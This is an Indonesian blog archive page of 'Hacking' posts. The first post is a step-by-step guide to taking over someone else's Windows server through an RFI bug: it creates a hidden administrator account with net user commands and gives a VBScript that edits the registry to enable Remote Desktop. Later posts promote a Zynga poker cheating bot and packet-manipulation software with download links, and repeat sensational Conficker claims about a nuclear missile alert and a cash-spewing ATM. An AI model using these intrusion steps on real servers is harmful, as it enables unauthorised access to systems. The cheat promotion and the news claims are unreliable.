stmikbg-dot-com

Informasi Seputar IT

Archive for the ‘Hacking’


Menjalankan service remote desktop secara remote

Hari ini saya ingin berbagi pengalaman saya yang agak cupu kepada anda. Langsung saja, saya kebetulan mendapatkan sebuah server windows yang agak jebol dikit pada aplikasi webnya, yah semacam bug er-ef-i (RFI) gitu. Nah berbekal dari bug ini saya ingin sekali memiliki server yang bisa diremote lewat RDP (Remote Dekstop). Langsung aja kita keTKP.

 - Bikin user baru untuk login "net user 
 /add" ( tanda petik ditelan aja ya.. gak dimasukkan ke command shellnya)
 - Set local group user tersebut kalo bisa diatasnya admin hahaha ada ya??? "net localgroup administrators  /add"
 - trus cek port 3389 kebuka apa gak, jika kebuka anda langsung bisa connect keserver tersebut menggunakan "mstsc"

Jika step ketiga gagal, berarti anda belum beruntung.. Mau beruntung??? Baca terus artikel ini, Ok.. kita lanjut kestep berikutny.. karena service RDP belum jalan maka anda harus membuat sebuat entry pada registry untuk menjalankan service RDP ini.

"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\"

The value of interest is a DWORD named:  "fDenyTSConnections"
Setting this flag to FALSE (0) should handle it for you.

Caranya??? kita bisa membuat sebuah vb-script untuk menjalankan fungsi ini.

SetRdState 0
Function SetRdState(desiredState)
' Set to true to enable RD on XP Pro
' False to disable
' returns true if call succeeds, false on error
Dim Sh, key_TS, keyValue
SetRdState = False
Set Sh = CreateObject("WScript.Shell")
Key_TS = "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\"
keyValue = Clng(Abs(CInt(desiredState)))
WScript.Echo "Desired value is", keyValue
On Error Resume Next
Err.Clear
Sh.RegWrite Key_TS & "fDenyTSConnections", keyValue, "REG_DWORD"
If Err.Number = 0 Then SetRdState = True
Err.Clear
On Error Goto 0
End Function

Jalankan script, dan anda bisa konek ke RDP server tersebut.

stmikbg.com under attack

Kejadian deface pada web stmikbg.com ini terjadi beberapa hari yang lalu, sempat kaget juga kok bisa dideface ya??? Setau saya script wordpress terkenal sangat aman. Karena merasa tidak aman lagi akhirnya saya mengambil keputusan untuk pindah hosting. Tapi proses pemindahan ini membuat stmikbg.com tidak bisa diakses berhari-hari. Yah, secara otomatis trafik langsung drop, page-rank digoogle jg turun.

Semua keyword digoogle yang biasanya posisi stmikbg.com selalu berada dinomor satu, kini diremove oleh google.

alih-alih bagi bot, akun facebook dicuri

Zynga Bot pokerHati-hati bagi pengguna facebook yang doyan maen poker, kini telah beredar trojan yang menyamar jadi bot poker. Korban yang gila poker akan diarahkan untuk login menggunakan akun facebooknya untuk menjalankan bot ini, bukannya bot yang didapatkan tetapi data login anda akan dikirim kesebuah host menggunakan sebuah server smtp. Sekali lagi hati-hati dalam mendownload bot poker.

Banyak sekali email yg dikirim untuk download bot poker, buat yang sudah mengirim email saya mohon maaf tidak bisa membalasnya satu persatu, sekedar info zynga server telah melakukan update pada systemnya, yang membuat bot tidak berfungsi. Tapi dari beberapa info ada juga teman yg punya bot dengan versi yang sama, bot nya tetap berfungsi dengan settingan tambahan.

Untuk informasi download botnya bisa dilink berikut ini http://code.google.com/p/zynga-poker-bot/ dan informasi seting botnya silahkan buka forum berikut http://forums.botage.com/

bot zynga poker cara cepat miliki chips

zynga_pokerGame satu ini lagi ngetren difacebook, game texas holdem poker by zynga, ini banyak sekali dimainkan oleh pengguna facebook, untuk mendapatkan chipsnya juga tidaklah murah, $5M chips seharga $150 USD, wow bukan nominal yang sedikit, lantas adakah cara untuk mendapatkan chips yang banyak?? Ingin langsung menjebol servernya zynga?? tentu ini pekerjaan yang tidak gampang, maling chips orang?? wow tentu ini juga tidaklah baik, berarti anda harus menjebol account facebook target. Satu2nya cara yakni ikut bermain pada table tapi anda harus menang terus dong biar cepat chipsnya bertambah. Apa ya bisa?? mungkin kalo anda jadi seorang penjudi sejati kemungkinan bisa lah, tapi kalo anda orang yang cupu kayak saya tentu susah sekali ya.. Tapi masalah diatas bisa diatasi jika anda menggunakan sebuah aplikasi yang bisa memanipulasi paket data dari server zynga, sehingga tiap rounding game anda selalu menang. Untuk informasi lebih lanjut anda bisa kirim email ke info@indovb.com saya akan beri anda link tempat download software ini.

Perhatian!!!!!

BOT ZYNGA POKER yang banyak beredar sudah tidak jalan lagi karena zynga telah melakukan update pada aplikasinya. Tetapi hasil recode ulang oleh teman saya BOT VER Z.4 100% RUNING. Anda bisa download di link berikut ini http://ghaza.li/games/zynga-poker/new-worked-zynga-poker-bot-vz4-1-january-2010/

Sepak terjang Conficker

Virus Conficker a.k.a Kido a.k.a Downdup benar-benar membuat kerusakan akhir-akhir ini. Sebuah instalasi rudal nuklir dekat Elmendorf Air force Base, dekat Anchorage, Alaska bersiaga penuh saat seorang teknisi didalam bunker mencurigai beberapa dari sistem kontrol mereka terserang Conficker.

Menurut Washington Post, status Defense Condition (DEFCON) 3 sempat ditetapkan didalam instalasi rudal nuklir tersebut. Berikut tingkatan Defcon dalam panduan perang nuklir A.S. :

* DEFCON 5 Normal peacetime readiness
* DEFCON 4 Normal, increased intelligence and strengthened security measures
* DEFCON 3 Increase in force readiness above normal readiness
* DEFCON 2 Further Increase in force readiness, but less than maximum readiness
* DEFCON 1 Maximum force readiness

Dan di Iceland, beberapa saat lewat tengah malam sebuah ATM mengeluarkan uang 100 Krona dengan sendirinya. Petugas bank menyatakan bahwa ATM berbasiskan operating sistem Windows tersebut mulai menghamburkan uang setelah seseorang memasukan infected USB Flash Disk (UFD) ke mesin tersebut. Wow Conficker benar-benar keren ya. Semoga orang-orang diindonesia tidak ikut-ikutan memasukkan conficker kemesin ATM.